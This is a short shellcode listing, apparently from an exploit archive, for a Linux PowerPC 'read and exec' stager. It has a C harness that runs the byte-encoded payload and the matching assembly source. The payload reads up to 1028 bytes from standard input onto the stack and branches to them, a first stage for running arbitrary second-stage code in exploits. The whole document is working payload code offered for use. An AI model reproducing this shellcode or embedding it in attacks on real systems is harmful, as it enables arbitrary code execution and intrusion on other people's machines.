read(0,stack,1028); stack(); shellcode for Linux PPC. readnexecppc-core.s appended.
d0b4499072948b6491f643ea4ced7fa7145948d309b2bbfe20f29161e8bd9115
/* readnexecppc-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* read(0,stack,1028); stack(); linux/ppc by core */
"\x7c\x63\x1a\x79" /* xor. r3,r3,r3 */
"\x38\xa0\x04\x04" /* li r5,1028 */
"\x30\x05\xfb\xff" /* addic r0,r5,-1025 */
"\x7c\x24\x0b\x78" /* mr r4,r1 */
"\x44\xde\xad\xf2" /* sc */
"\x69\x69\x69\x69" /* nop */
"\x7c\x29\x03\xa6" /* mtctr r1 */
"\x4e\x80\x04\x21"; /* bctrl */
int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte read & exec shellcode for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}
#;; read(0,stack,1024); stack();
#;; by Charles Stevenson (core) <core@bokeoa.com>
.globl main
main:
xor. %r3,%r3,%r3 #; file descriptor
li %r5, 1028 #; 1028 bytes
addic %r0,%r5,-1028+3 #; __NR_read
mr %r4,%r1 #; (void *) stack pointer
.long 0x44deadf2 #; syscall
.long 0x69696969 #; nop
mtctr %r1 #; move stack pointer into ctr
bctrl #; branch to ctr